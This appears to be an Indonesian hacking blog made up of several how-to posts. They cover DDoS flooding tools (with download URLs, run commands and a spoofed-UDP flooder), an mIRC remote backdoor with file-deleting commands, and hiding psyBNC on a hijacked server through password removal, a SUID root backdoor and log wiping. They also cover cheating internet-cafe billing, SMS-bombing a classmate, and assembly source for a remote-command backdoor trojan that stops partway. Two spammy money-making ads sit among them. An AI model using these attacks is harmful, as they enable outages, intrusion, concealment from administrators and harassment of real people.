Tembak IP (Ddos)

Author: Maulana Malik Ibrahim // Category:
Ada beberapa jenis senjata untuk ddos, tapi tetap saja tujuannya satu yaitu untuk melumpuhkan lawan...

1. Automatic Flooding packet
kekekek...
Pusing ama udp.pl jangan khawatir ini saya bikin sedikit tool
jadi kita gak bersusah payah nungguin shell buat flooding
tools ini bekerja efektif akan menyerang setiap 15 menit sekali dengan rentang 1 menit istirahat..
coba deh ok banget ..:D
download file nya disini..
Ddos

selanjutnya:
tar -zxvf ddos.tar.gz
cd ./DENIAL

trus ketik
./terus 0 000000000000000000;./bunuh;./ran

2. Tembak C
wget http://h1.ripway.com/mau1ana/tutorial/tembak/tembak.tgz
atau Download disini
Tembak C
ketik di shell
terus enter
mv tembak.tgz tembak.c
gcc -o tembak tembak.c

baru kita laksanakan penembakan
./tembak ip port

Tembaaak..!!! target 125.162.97.48 port 53

3. Vadim
wget http://h1.ripway.com/mau1ana/tutorial/tembak/vadim.tgz
tar -zxvf vadim.tgz
rm -rf vadim.tgz
cd flood
./vadimI ip port time
./vadim 202.65.236 53 1000

4. Exploits flooding UDP dengan IP source di spoofing
Sekarang saya mau berbagi exploits flooding UDP dengan IP source di spoofing, jadi susah di cari asal flooding dan susah di blok juga qe3x. Pertama-tama downlod dulu exploits floodingnya di
http://h1.ripway.com/mau1ana/tutorial/tembak/f-udp.tar.gz
atau Download di bawah ini
Exploits flooding UDP
Exploitsnya hanya bekerja dilinux dan karena harus pakai spoofing butuh root untuk mengakses raw socket. Cara pakeknya
root#wget http://h1.ripway.com/mau1ana/tutorial/tembak/f-udp.tar.gz
root#tar zxcf f-dup.tar.gz
root#cd f-udp
root#./fudp
Simple UDP Flooder With Spoofing Support
By : Anonymous [at]Undergroundz

Gunakan : ./fudp
Untuk Contoh : ./fudp 10.10.10.xxx 53 (This is to flood DNS port)

root#./fudp 172.16.11.119 53

nah nanti ditarget, IP yang kebaca random ini misal hasil tcpdump
nya.

korban#tcpdump udp
22:37:47.938403 IP 34.72.100.23.2555 > 172.16.11.119.domain: 0 [0q] (1400)
22:37:47.938519 IP 34.72.100.23.2555 > 172.16.11.119.domain: 0 [0q] (1400)
22:37:47.940737 IP 176.156.132.90.13295 > 172.16.11.119.domain: 0 [0q] (1400)
22:37:47.940854 IP 176.156.132.90.13295 > 172.16.11.119.domain: 0 [0q] (1400)
22:37:48.877756 IP 124.204.8.59.13344 > 172.16.11.119.domain: 0 [0q] (1400)
22:37:48.877872 IP 124.204.8.59.13344 > 172.16.11.119.domain: 0 [0q] (1400)

korban# ifstat -b
eth1
Kbps in Kbps out
6500.14 526.43
42242.85 3042.93
42411.86 2959.97
42243.99 2904.69
Label : Phone Cell Wallpapers Game Phone Free Games Free car body design

Hacking Client IRC Dengan Perintah Remote

Author: Maulana Malik Ibrahim // Category:
kode ini, mungkin sebutannya backdoor lebih tepatnya karena dapat memberikan akses penuh ke komputer yg terinfeksi melalui remote didalam mirc. kode ini saya pertama kali lihat di remote mirc saya ketika saya sedang di kerjain teman saya sendiri,lalu saya mencoba bertanya kepada dia bagaimana cara kerjanya? lalu dia menjelaskan kepada saya cara kerjanya. Kode mirc-nya sebagai berikut : ctcp *:*:?:$1- di taruh di remote lawan anda,..
mungkin anda semua bisa mencobanya sendiri dengan membuka 2 mirc di komputer anda yg sudah terkoneksi, lalu anda taruh kode ini di salah satu mirc yang mau di ujikan. cara kerja kode ini melalui client to client protokol. kode tersebut memberikan akses penuh kepada siapa saja yang meng query mirc yang terinfeksi dgn perintah-perintah standard yang di gunakan dalam mirc. perintahnya:
misalkan nick yg terinfeksi = dedi-plg
1. untuk merubah nicknya cukup menggunakan perintah /ctcp dedi-plg nick gua_bego , nick lansung berubah ke gua_bego
2. untuk membuat mirc terinfeksi mengirimkan msg /ctcp gua_bego msg nick-yg-mau-di-msg/#channel tesssstessssssstesssssss123 tapi jangan pake kata kotor ,, kasihan juga ntar kena banned hehehhhe
3. untuk membuat dia menjalankan program. /ctcp gua_bego run iexplore.exe www.jasakom.com
4. untuk meng-shutdown komputer lawan. /ctcp gua_bego run rundll32.exe user,exitwindows
Mungkin ini agak seram kalo di buat perintah untuk menghancurkan komputer lawan,.. kalo anda terpikir utk mem-format komputer lawan,, kayaknya bakalan susah karena kalo anda menjalankan format c:, kemungkinan tidak bisa karena hard-disk terpakai oleh mirc terinfeksi . tapi kalo di pikir-pikir masih bisa juga mendelete files komputer terinfeksi kode ini yaitu dengan cara menggunakan perintah:/ctcp gua_bego run c:\windows\command\deltree /y
c:\windows\system
/ctcp gua_bego run c:\windows\command\deltree /y
c:\windows
--kayaknya bakal berabe deh.
# Tolong jangan di pakai buat merusak komputer yang terinfeksi, mungkin anda bisa menggunakan perintah-perintah yang tidak merusak just for phun
Label : Phone Cell Wallpapers Game Phone Free Games Free car body design

Trik Memasang & Menyembunyikan PSYBNC di Shell Target

Author: Maulana Malik Ibrahim // Category:
Saya akan mencoba memberikan trik kepada Anda tentang bagaimana menyembunyikan PSYBNC Anda dari si Admin sehingga seminimal mungkin PSYBNC Anda tidak akan di curigai oleh si Admin. Banyak sekali kecerobohan-kecerobohan yang di lakukan oleh kita ketika kita memasang PSYBNC di target yang mengakibatkan PSYBNC Anda tidak bertahan lama padahal jika Anda bisa mengakali system dan mencoba mempelajari system tersebut Anda akan dapat menemukan teknik-teknik ini. Di sini Anda hanya di tuntut untuk bisa kreatif dalam mengakali system tersebut.
Sebelumnya saya akan membeberkan beberapa kecerobohan yang sering kita lakukan ketika kita memasang PSYBNC di server target:
1. Menjalankan PSYBNC dengan login user yang kita add di shell target.
Ini adalah kecerobohan yang paling fatal yang seringkali kita lakukan. Kalau saya menjadi seorang Admin ketika saya akan mengecek system maka yang akan saya cek pertama kali adalah file /etc/passwd karena di file tersebutlah terdapat seluruh nama user yang bisa login ke system. Ketika saya menemukan ada nama user yang berbeda dengan nama user yang ada di file /etc/passwd yang sebelumnya saya backup maka bisa di pastikan bahwa ada user illegal yang baru saja masuk ke dalam system. Dan ketika saya menemukan kejanggalan ini maka saya akan langsung menghapus home direktori dari user tersebut dengan recursife mode yang berarti seluruh folder beserta isinya akan di hapus tanpa kompromi. Bisa di pastikan juga bahwa file PSYBNC Anda yang di simpan di folder tersebut akan ikut terhapus.
file yang asli….
….
nscd:x:28:28:NSCD Daemon:/:/bin/false
ident:x:98:98:pident user:/:/sbin/nologin
radvd:x:75:75:radvd user:/:/bin/false
xnuxer:x:500:500::/home/xnuxer:/bin/bash

isi file /etc/passwd yang telah termodifikasi….

….
nscd:x:28:28:NSCD Daemon:/:/bin/false
ident:x:98:98:pident user:/:/sbin/nologin
radvd:x:75:75:radvd user:/:/bin/false
xnuxer:x:500:500::/home/xnuxer:/bin/bash
anto:x:76:75::/etc/.anto:/bin/bash ß dari sini si Admin bisa menebak

2. Menyimpan file PSYBNC di folder yang tidak tersembunyi.
Bila kita melihat contoh kasus di point pertama di atas Anda seharusnya menyembunyikan folder psybnc dan merubah nama folder dengan nama lain sehingga ketika si Admin mengecek folder user dengan menggunakan command ls maka file Anda tidak akan terlihat.
3. Menjalankan PSYBNC dengan menggunakan nama file PSYBNC atau file konfig yang tidak di rename nama filenya.
Ketika si Admin sudah mencurigai bahwa systemnya telah di masuki orang lain maka bisa di pastikan si Admin akan mengecek file-file yang running di system dengan menggunakan perintah ps –ax dan si Admin melihat ada process system yang menggunakan nama PSYBNC maka bisa di pastikan si Admin akan langsung menjalankan perintah killall psybnc dan semua file yang di run dengan nama tersebut langsung mati.

1058 tty3 S 0:00 /sbin/mingetty tty3
1059 tty4 S 0:00 /sbin/mingetty tty4
1060 tty5 S 0:00 /sbin/mingetty tty5
1061 tty6 S 0:00 /sbin/mingetty tty6
1064 tty1 S 0:00 -bash
1103 tty2 R 0:00 ./psybnc psybnc.conf
1124 tty1 R 0:00 ps -ax

Jadi gimana caranya…? Saya akan memberikan trik yang aman yang bisa Anda coba dan Anda kembangkan sendiri. Dengan melihat tiga kasus di atas maka ada beberapa cara untuk mengatasinya.

- Jangan membuat user login ke dalam file /etc/passwd ketika Anda mendapatkan akses root dengan menggunakan eksploit tapi manfaatkan user yang sudah ada di file tersebut dan user tersebut di pakai oleh system dengan menggunakan shell bash atau sh. Misalnya seperti: news, mysql, postgres, etc. Anda bisa memilih beberapa user system yang bisa di manfaatkan, kemudian hapus password dari user tersebut dengan menggunakan perintah passwd –d [nama user] sehingga ketika Anda login dengan menggunakan nama user tersebut, password tidak akan di minta oleh system. Jika Anda login dengan menggunakan SSH yang sudah jalan di system hal ini tidak berlaku dan Anda tetap akan di mintai password kecuali jika Anda bisa mengakali SSH target dengan menggunakan beberapa trik (hehehe…. ).

contoh user yang bisa di pakai …
rpm:x:37:37::/var/lib/rpm:/bin/bash

menghapus password rpm …
sh-2.05# passwd -d rpm
Changing password for user rpm
Removing password for user rpm
passwd: Success

setelah password di hapus …

bash$ su rpm
[rpm@serv /var/lib/rpm]$

- Jalankan beberapa backdoor di system yang bisa memberikan akses root tanpa harus merubah file /etc/passwd seperti di bawah ini:

bash# ./sux
Backdoor SUID by Schizoprenic. Xnuxer Research Center, 2002
Private Only!, Don't Distributed...!
Step 1 - Checking paths and write permisions
Checking write permisions on /tmp...Ok
Checking read permisions on /bin/su...Ok
Checking that /tmp/LC_MESSAGES does not exist...Ok
Step 2 - Creating evil libc.mo and setting enviroment vars
Step 3 - Getting address of .dtors section of /bin/su
..........................................done
.dtors is at 0x0804cd4c
Step 4 - Compiling suid shell
/tmp/.sh created Ok
Step 5 - Executing /bin/su
Step 6 - Set permission file...
Step 7 - Successfull...!
Run root shell with type /tmp/.sh, Enjoy bro ;P ...!
bash# exit
bash$ /tmp/.sh
sh-2.05# id
uid=0(root) gid=0(root) groups=500(xnuxer)

- Buat nama direktori tersembunyi dengan menggunkan akses root di lokasi yang sering di pakai oleh system seperti di direktori /etc, /var, dsb dengan menggunakan karakter ‘.’ (titik) di depan direktori yang akan kita buat ( .sh ). Caranya adalah sbb:

bash# mkdir /var/log/… ß Ini dia direktori yang tersembunyi hehehe….
bash# chmod 700 /var/log/…
bash# chown xnuxer:xnuxer /var/log/…

xnuxer adalah nama user yang sudah ada di /etc/passwd (tanpa merubah file tersebut) yang nanti akan di gunakan untuk menjalankan file psybnc.

- Gunakan nama user yang ada di file /etc/passwd yang bukan milik system untuk menjalankan file psybnc Anda dengan cara menghilangkan karakter ‘x’ setelah nama user. Jangan menggunakan perintah passwd –d [nama user] untuk menghilangkan password user tersebut karena hal ini akan mengakibatkan kecurigaan user yang login dengan name login yang kita pakai ketika dia login dan tidak di mintakan password oleh system. Dengan menambahkan kembali karakter ‘x’ di user name yang kita hapus karakter ‘x’ –nya, hal ini akan mengembalikan password user tersebut tanpa perlu proses yang rumit.

sebelum karakter ‘x’ di hapus …

xnuxer:x:500:500::/home/xnuxer:/bin/bash

sesudah karakter ‘x’ di hapus …
xnuxer::500:500::/home/xnuxer:/bin/bash
login dengan user yang karakter ‘x’ sudah di hapus …
bash$ su xnuxer
[xnuxer@serv /home/xnuxer]$
mengembalikan karakter ‘x’ yang di hapus …
xnuxer:x:500:500::/home/xnuxer:/bin/bash
login dengan user yang karakter ‘x’ sudah di tulis kembali …

bash$ su xnuxer
password:
- Setelah Anda menghapusk karakter ‘x’ di /etc/passwd dengan menggunakan akses root selanjutnya login dengan nama user tersebut. Kemudian masukalh ke direktori tersembunyi yang telah kita buat seperti contoh di atas.

bash$ cd /var/log/…

simpan file psybnc Anda di direktori ini dan rename file psybnc Anda dengan nama lain misalnya … atau .sh

bash$ mv psybnc …

ganti juga nama konfig psybnc dengan nama yang tidak di curigai
bash$ mv psybnc.conf httpd
jalankan psybnc….

bash$ ./… httpd
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,----.,----.,-. ,-.,---.,--. ,-.,----.
| O || ,-' \ \/ / | o || \| || ,--'
| _/ _\ \ \ / | o< | |\ || |__
|_| |____/ |__| |___||_| \_| \___|
Version 2.3 (c) 1999-2001
the most psychoid
and the cool lam3rz Group IRCnet

Configuration File: httpd
Language File: psyBNC Language File - English
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 3456
psyBNC2.3-cBtITLdDMSNp started (PID 379185)

so? Heheheh… sekarang Anda bisa memakai psybnc Anda… dan ketika si Admin menjalankan perintah ps –ax maka akan terlihat proses seperti di bawah ini:

1060 tty5 S 0:00 /sbin/mingetty tty5
1061 tty6 S 0:00 /sbin/mingetty tty6
1064 tty1 S 0:00 –bash
1132 tty2 R 0:00 ./… httpd
1136 tty1 R 0:00 ps -ax

- Keluarlah dari user login yang Anda pakai, kemudian dengan akses root tambahkan kembali karakter ‘x’ di user name yang Anda pakai tadi untuk mengembalikan password user yang Anda pakai.

mengembalikan karakter ‘x’ yang di hapus …
xnuxer:x:500:500::/home/xnuxer:/bin/bash

login dengan user yang karakter ‘x’ sudah di tulis kembali …
bash$ su xnuxer
password:

Demikian cara yang saya tawarkan kepada Anda yang bisa menjadikan pilihan bagi Anda untuk memperpanjang umur psybnc hehehehe…. Saya sarankan juga agar Anda menghapus log yang ada di system baik dengan program Log Remover atau program penghapus log yang lain.

sh-2.05# ./rem postgres
Log Remover by Schizoprenic, Xnuxer Research Center, 2002
Step 1 - Check log...
Found 2 record(s) for user postgres
Step 2 - Cleaning Up....
Cleaning up 2 record(s) from /var/log/wtmp ... OK
Cleaning up 2 record(s) from /var/run/utmp ... OK
Cleaning up /var/log/lastlog ... OK
Cleaning up /var/log/messages ... OK
Cleaning up /var/log/secure ... OK
Cleaning up /var/log/maillog ... OK
Step 3 - Successfull Cleaning up...

Sekian trik dari saya, jika Anda ingin maju belajarlah untuk kreatif dan kuasai system Anda bukan system yang membuat Anda terkuasai, pelajari system so.. Anda akan menemukan jawaban dari apa yang Anda cari selama ini.
Label : Phone Cell Wallpapers Game Phone Free Games Free car body design

Menghack Billing Warnet

Author: Maulana Malik Ibrahim // Category:
Kali ini saya berhasil bereksperimen dan nyobain tools-tools kecil tapi bermanfaat bangget!!!
Ok! Langsung saja. Target saya kali ini adalah WARNET!!!
Tools yang dibutuhkan :
1. Zhider 2.0 atau AceHider Free
2. Startup Manager

Toolsnya bisa dicari melalui paman google atau download dibawah ini:
Zhider 2.0

Log in seperti biasa diwarnet kesayangan kamu (bioskop kali!!!)
Setelah online, saatnya beraksi
Buka zhider.exe, untuk membaca keterangan tentang software tersebut dan penggunaannya silakan baca readme.txt.
Setelah Zhider.exe diexecute, maka akan tampak pada tab Processes di Task Manager

Bila menggunakan Kapersky Antivirus maka akan terdeteksi sebagai Invader

Untuk amannya bisa menggunakan AceHider Free, tapi perlu diinstall. Apalagi status kamu cuma Guest bukan Administrator, jadi mustahil untuk menginstall sebuah software kedalam kompi.
Tapi jangan khawatir, kali ini gue udah siapkan semua.
Kamu bisa mengesktrak Folder AceHider Free dari Tools Hacking.Zip, atau AceHider Free.exe dari folder tersebut.
Tapi bila menggunakan AceHider Free maka akan tampak pada taskbar, sehingga kemungkinan ketahuan akan lebih besar.
Sekarang tinggal memilih tools mana yang ingin kamu pakai Zhider atau AceHider Free?
Kita masuk dalam penggunaan tools tersebut

1. Menggunakan Zhider
Bila kita menggunakan Zhider, kendala yang akan kita dapati adalah terdeteksi oleh antivirus, tapi biasanya warnet dikota gue memakai McAfee dan NOD32, walaupun diupdate tetap saja nggak bisa dideteksi. Kecuali menggunakan Kapersky, itupun hanya terdeteksi bila Task Manager dibuka. Oleh karena itu Zhider cukup aman untuk dipakai.
Setelah mengeksekusi Zhider.exe, kita dapat mencobanya dengan menyembunyikan jendela apapun yang sedang aktif. Untuk menyembunyikan jendela yang sedang aktif tekan Ctrl+Alt+Z, sedangkan untuk menampilkan kembali jendela tersebut tekan Ctrl+Alt+X.
AceHider dapat dijalankan walaupun kompi direstart, tapi Zhider tidak. Oleh karena itu gunakanlah Startup Manager yang ada di tools hacking.zip, dengan file bernama strun.exe. Fungsinya untuk menjalankan sebuah aplikasi waktu kompi di Reboot.
Kita akan mengaktifkan Zhider.exe pada waktu kompi di reboot, sehingga pada waktu kita mampir kewarnet, kita bisa main GRATISSS!!! Khan tinggal di Ctrl+Alt+Z, jendela log ini akan disembunyikan. Browsing deh sesuka hati:p
Jalankan strun.exe, buka File, new startup item (Ctrl+N)
Tambahkan Zhider.exe, dengan membuka Zhider pada tempat anda menyimpan file tersebut. Berilah nama untuk Zhider dengan nama yang tidak mencurigakan seperti Adobe Updater. Ok ! Selesai deh!


Sekarang, log out dan klik pada jendela log in tepatnya didaerah kosong dimana saja, kemudian tekan Ctrl+Alt+Z.
2. Menggunakan AceHider Free
Bila kita menggunakan AceHider, maka akan terasa lebih mudah. Aktifkan Acehider, untuk menyembunyikan jendela yang sedang aktif double klik pada icon tray pada taskbar, maka jendela yang aktif akan disembunyikan, untuk menampilkan kembali, klik kanan pada icon tray. Kemudian pilih Show Window.
Anda dapat mengatur program ini sesuka hati dengan mengatur Preferences.
Klik kanan lalu pilih Preferences, gantilah system hot keys dengan pilihan anda




Setelah itu log out, dan tekan tombol sesuai pilihan anda yang telah anda atur untuk menyembunyikan jendela log in

Ingat !!! Jangan lupa berdoa sebelum tidur, sorry Resiko tanggung sendiri.
Label : Phone Cell Wallpapers Game Phone Free Games Free car body design

Mau mbaca iklan, trus dapet duit?

Author: Maulana Malik Ibrahim // Category:
Mau mbaca iklan, trus dapet duit? mau dapet bonus $10 ketika sign up?, mau?
untuk daftar klik > disini
dan dapatkan bonusmu $10
Buruannnnn...........
Label : Phone Cell Wallpapers Game Phone Free Games Free car body design

Surfey dibayar harga mahal

Author: Maulana Malik Ibrahim // Category:
anda mau surfing dan dibayar karenanya?
ada program simple yang bisa membuat anda memiliki $25 dalam waktu 10 menit
dan anda bisa join dengan gratis!!!!!!!!!
c'mon to make money online

mau join klik aja disini
Label : Phone Cell Wallpapers Game Phone Free Games Free car body design

SMS Bomber Indosat

Author: Maulana Malik Ibrahim // Category:
Sebel sama orang? wew sering atuh w juga wkwkwkwkwk, tapi yang ini bner bner nybelin tw!
Cek dan ricek ternyata anak sekelas, dan dia pakai im3, hihihihi salah besar dia ngerjain orang kyak w :)
Langsung saja nomor dia w bomb selama satu jam!! wkwkwk ribuan sms pun datang kepada dia :)
Handphone nya hank! sukur mank enak!! wkwkwkwkw, ok to the point.
Persiapan:
1. Browser Mozilla Firefox
2. Addons ReloadEvery download dan install disini
https://addons.mozilla.org/en-US/firefo ... 2.0-fx.xpi
3. Koneksi Kenceng *periphreal*
Langkah:
1. Browse ke http://www.indosatcommunity.com/registration
2. Registrasi saja asal asalan
- Isi username asal asalan
- Password isi asal asalan
- Cocokan capctha

3. Setelah registrasi daftarkan MSISDN target Bomb contoh 62856161651 tersedia kotak box 4


4. Klik Register
5. Nah disini klik Send Passkey Again disebelah kotak box kosong..
6. Stelah di klik Send Passskey Again akan muncul tulisan Your passkey has been sent!


7. Klik kanan di page lalu pilih Reload Every dan Custom kan ke 1 - 2 Seconds..
8. Jika mucul dialog Box, tekan ENTER bukan di klik OK
9. Selesai :) tunggu selama 1 jam / 2 jam tergantung kekeselan kamu :D

Dalam proses pengeboman jangan membuka tab lain yang menuju ke page registrasi IndosatCommunity.com karena akan mengulang cookies kamu dan ternyata setelah di Reload Every ternyata page nya redirect ke step awal..

Target Bomb akan mendapat sms yang isinya
Sender: INDOSAT
Body: Passkey Anda untuk Indosat Community adalah xxxx
Label : Phone Cell Wallpapers Game Phone Free Games Free car body design

How to make Backdoor and Remote it

Author: Maulana Malik Ibrahim // Category:
Kebanyakan mereka yang udah pada pinter ngebuat tool-tool hacking pada nggak mau bagi-bagi ilmunya, bukan mengajarkan gimana caranya, tapi bagaimana memanfaatkan/menggunakan tool buatannya, bagiku hal ini sangat menyedihkan karena selain membuat kita jadi pasif juga nggak akan menambah kesaktian kita

Sebagai ungkapan rasa terimakasih saya kepada mereka yang sudah rela mengorbankan waktunya untuk berbagi-bagi ilmu baik lewat e-mail, lewat komunitas jasakom, maupun lewat alam mimpi J. maka dengan ini saya juga bermaksud untuk berbagi ilmu, tentu khusus bagi yang belum pada tahu aja.

Kali ini saya nggak membahas virus atau keygen, tapi saya akan membahas bagaimana cara membuat program kayak backdoor.

Apa itu backdoor?

Backdoor termasuk salah satu golongan malware atau program berbahaya, kenapa dikatakan berbahaya?, karena dengan backdoor seorang hacker bisa mengendalikan komputer, bisa meremote dari jauh, mencuri data berharga seperti password, pin, data finansial perusahaan bahkan untuk aksi yang fatal, misal: memformat hardisk!.

Cara kerja backdoor

Sesuai namanya cara kerja backdoor cukup sederhana, yaitu dengan cara membukakan pintu belakang dan yang pasti secara diam-diam, pintunya biasanya berupa port, backdoor akan menanti si pembuat backdoor tersebut datang (menghubunginya). Apabila sang pembuat backdoor datang maka backdoor akan membukakan pintu lalu mempersilahkannya masuk dan melindunginya dari pengawasan keamanan, tentu setelah itu hacker (si pembuat backdoor) dapat melakukan apa saja yang dia inginkan dengan leluasa. sangat mengerikan!!

Baiklah dari pada kebanyakan omong, sekarang langsung kita mulai aja tutorialnya.

Sebelum kita memulai experimen ini, sebaiknya kita pelajari dulu teorinya.

Dalam pemrograman jaringan biasanya dibutuhkan yang namanya socket, socket disini maksudnya bukan socket pada jenis-jenis prosesor kayak socket-A, socket 393 atau socket AM2, tapi socket sebagai obyek untuk melakukan pertukaran data (packet) secara byte per byte. begitu juga backdoor, dia juga membutuhkan socket untuk mewujudkan komunikasi. bagi para programmer jaringan, saya yakin pasti dah tahu teori dan cara kerja backdoor ini.

Pada pembuatan backdoor kita harus membuat dua socket, kenapa dua? karena socket tersebut adalah penghubung, misal jika kita ingin ngobrol jarak jauh kita harus pake telpon, si A menelpon si B, maka socket itu bisa kita asumsikan sebagai telpon, dan tidak mungkin komunikasi akan terjadi apabila telponnya cuma satu (cuma si A yang punya telpon), begitu juga dengan socket harus ada dua, yang satu untuk backdoor (server) dan satunya lagi untuk si pembuat backdoor (client).

.data?

sock1 SOCKET ? ; socket pertama [ backdoor ]

sock2 SOCKET ? ; socket kedua [ attacker ]

Setelah itu kita butuh yang namanya port, apa itu port?, berdasarkan wujudnya port dibagikan menjadi dua jenis, port fisik dan port logika, port fisik itu yang bisa kita lihat langsung di belakang komputer, kayak COM1, COM2, USB dll. kalo port logika itu bisa banyak banget, bisa sampai ribuan dan nggak bisa kita lihat, nah port yang akan kita gunakan disini adalah port logika, kalo tadi socket bagaikan telpon maka port bagaikan kabelnya dan IP address bagaikan nomor telponnya, tanpa itu semua komunikasi mustahil terjadi.

Setelah socket tercipta kita akan tentukan port yang akan kita gunakan sebagai jalur komunikasi, pilih port yang masih kosong atau belum kepake, contoh di program ini saya gunakan port 2194. untuk memasang portnya kita harus terlebih dahulu mengisi variabel pada struktur sockaddr_in yang memiliki rangkaian :

sockaddr_in STRUCT

sin_family WORD ?

sin_port WORD ?

sin_addr in_addr <>

sin_zero BYTE 8 dup (?)

sockaddr_in ENDS

diisi dengan cara :

push 2194 ; nomor port yang akan dibuka backdoor

call htons

mov sockaddr_in.sin_port,eax

Setelah struktur sockaddr_in diisi maka langkah selanjutnya adalah binding :

push sizeof sockaddr_in ; Besar struktur soackaddr_in

push offset sockin1 ; alamat sockaddr_in 1

push sock1

call bind ; binding

cmp eax,SOCKET_ERROR ; socket error

jnz socket_oke ; udah ada atau port udah digunakan

xor eax,eax ; null

ret

socket_oke:

mov eax,1

ret

agar lebih jelas lihat source code lengkapnya di bawah ini :

================[ POTONG DISINI ]===================

;==================================================

; SIMPEL BACKDOOR TROJAN

; WRITTEN BY : [4NV|e]

; anvie_2194@yahoo.com

;

; compile with MASM

; ml /c /coff backdoor.asm

; link /subsystem:windows /opt:noref backdoor.obj

;==================================================

.386 ; 32 bit

.model flat,stdcall

option casemap:none

include \masm32\include\windows.inc

include \masm32\include\user32.inc

include \masm32\include\wsock32.inc

include \masm32\include\kernel32.inc

include \masm32\include\winmm.inc

include \masm32\include\shell32.inc

includelib \masm32\lib\user32.lib

includelib \masm32\lib\wsock32.lib

includelib \masm32\lib\kernel32.lib

includelib \masm32\lib\winmm.lib

includelib \masm32\lib\shell32.lib

.data? ; .data section

sock1 SOCKET ? ; socket pertama

sock2 SOCKET ? ; socket kedua

sockin1 sockaddr_in <> ; struktur

sockin2 sockaddr_in <>

s2IP dd ?

wsad WSADATA <> ; WSA struktur

hFile dd ?

hBW dd ?

lenn dd ?

.data

AppName db "AnShell",0

szKonek db "Connected : ",0

szLogon db 13,10

db "______________________________________________",13,10

db " __, WELCOME TO : ",13,10

db " | | ___, . __ . . ",13,10

db " |__| ,__ (____ |__ / / | | ",13,10

db " | | | | ,____) | ) \/__ |__ |__ ",13,10

db 13,10

db " By:[4NV|e] ",13,10

db " this stuff is for education purpose only ",13,10

db " Source : www.jasakom.com ",13,10

db "______________________________________________",13,10

db 0

szMasuk db "[ You already entered system ]",13,10

szPerintah db "Command : ",0

szSelesai db 13,10," - thanks for visiting",13,10

db " - [4NV|e]",13,10

db " - anvie_2194@yahoo.com",13,10

db " - www.anvie.net.tc",0

szSocketError db "shit, socket error",0 ;what the fuck!

szPerintahX db "Command not found.",13,10,0

szKosong db 13,10

szOpen db "Open",0

; perintah-perintah

Perintah1 db "msgbox",0

Perintah2 db "close",0

Perintah3 db "shell",0

Buffer db 512 dup(0) ; buffer

Buffer2 db 512 dup(0) ; buffer

KeepOF dd 0 ; buat jaga-jaga biar gak terjadi buffer overflow

.code ; .code section

; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««

StartUp proc ; prosedur awal pembuatan socket

push offset wsad

push 0101h

call WSAStartup

push 0

push SOCK_STREAM

push PF_INET

call socket ; buat socket utama (server? :P)

; backdoor!

mov sock1,eax

mov ax,AF_INET

mov sockin1.sin_family,ax

xor eax,eax

mov sockin1.sin_addr,eax

push 2194

call htons ; Buka port 2194 (Lucky Number ;)

mov sockin1.sin_port,ax ; masukin port ke struktur sockaddr_in

mov eax,sizeof sockaddr_in

push eax

push offset sockin1

push sock1

call bind

cmp eax,SOCKET_ERROR ; apakah socket oke ?

jnz socket_oke

xor eax,eax ; tidak, return 0

ret

socket_oke: ; oke, yeah return 1

mov eax,1

ret

StartUp endp

; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««

BersihkanBuffer proc uses edi lpBufferWORD,jmlWORD

xor al,al ; Isi buffer jadikan nul byte

mov edi,lpBuffer ; dibutuhkan di lingkungan assembly

mov ecx,jml

rep stosb ; mnemonik stosb mengeset alamat edi

; dengan nilai dari eax

ret

BersihkanBuffer endp

; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««

Tarjim proc lpCommandWORD ; prosedur untuk menerjemahkan perintah

LOCAL lBuffer[512]:BYTE ; untuk dieksekusi.

LOCAL argWORD

LOCAL arg2WORD

push lpCommand

call lstrlen

cmp eax,2

jne perintah_ok

ret

perintah_ok:

lea edi,lBuffer

push edi ; selamatkan edi ke stack

;

push 512

push edi ; bersihkan lBuffer

call BersihkanBuffer

mov edi,lpCommand

mov al,020h ; cari byte 20h dimana 20h=karakter spasi

mov ecx,512 ; simpel deteksi argumen

repnz scasb ; cari!

dec edi

test ecx,ecx ; apakah karakter spasi ditemukan?

jnz cmd_ok ; jika ya goto cmd_ok

mov edi,lpCommand

mov al,0dh ; jika tidak, cari karakter enter (0dh/13)

mov ecx,512

repnz scasb

dec edi

mov byte ptr [edi],0 ; jika ketemu set null byte

jmp no_arg ; argumen tidak ada goto no_arg

cmd_ok:

mov byte ptr [edi],0 ; nullkan karakter spasi

inc edi

mov arg,edi ; simpan argumen pertama

push edi

call lstrlen

add edi,eax

sub edi,2 ; nullkan 2 byte terkahir maksud 2 byte terakhir

mov word ptr [edi],00 ; disini adalah 0ah 0dh (enter)

no_arg:

pop edi ; kembalikan edi dari stack

push lpCommand

push edi

call lstrcpy ; kopikan string perintah ke buffer

push offset Perintah1

push edi

call lstrcmpi ; compare string insensitive

or eax,eax

jz msgbox ; apakah perintah msgbox ?

push offset Perintah2

push edi

call lstrcmpi

or eax,eax ; apakah perintah close ?

jz mati

push offset Perintah3

push edi

call lstrcmpi

or eax,eax ; apakah perintah shell ?

jz shell

xor eax,eax ; perintah gak ada yang cocok

ret ; kembali dan tampilkan pesan

msgbox:

mov eax,MB_OK

or eax,MB_SYSTEMMODAL

or eax,MB_TOPMOST

push eax

push offset AppName

push arg

push 0

call MessageBox

jmp retCmd

mati:

push offset szSelesai

call lstrlen

mov lenn,eax

; tampilkan pesan selesai

push 0

push lenn

push offset szSelesai

push sock2

call send

; tutup socket

push sock1

call closesocket

push sock2

call closesocket

; bersihkan memori

call WSACleanup

xor eax,eax

push 0

call ExitProcess

shell:

; cari untuk argumen ke 2 atau sub commandline

mov arg2,0

mov edi,arg

mov ecx,512

mov al,20h ; 20h = spasi

repnz scasb

cmp ecx,0 ; spasi ditemukan ?

je no_arg2 ; jika tidak goto no_arg2

dec edi

mov byte ptr [edi],0 ; ada, nullkan

inc edi

mov arg2,edi ; simpan arg2 ke memori

no_arg2:

push 1

push 0

push arg2

push arg

push offset szOpen

push 0

call ShellExecuteA ; eksekusi!

jmp retCmd

retCmd:

mov al,1

ret

Tarjim endp

; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««

start:

call StartUp ; panggil prosedur startup

test eax,eax ; apakah socket oke?

jz socket_error ; jika tidak socket = error

; socket dah oke

; buat listening ke port 2194

push 1

push sock1

call listen

new_session:

push sock2 ; tutup socket 2

call closesocket ; berfungsi setelah looping

mov eax,sizeof sockaddr_in

mov lenn,eax

push offset lenn

push offset sockin2

push sock1

call accept ; menunggu perintah dari socket 2

mov sock2,eax ; simpan alamat socket 2

push offset szLogon

call lstrlen

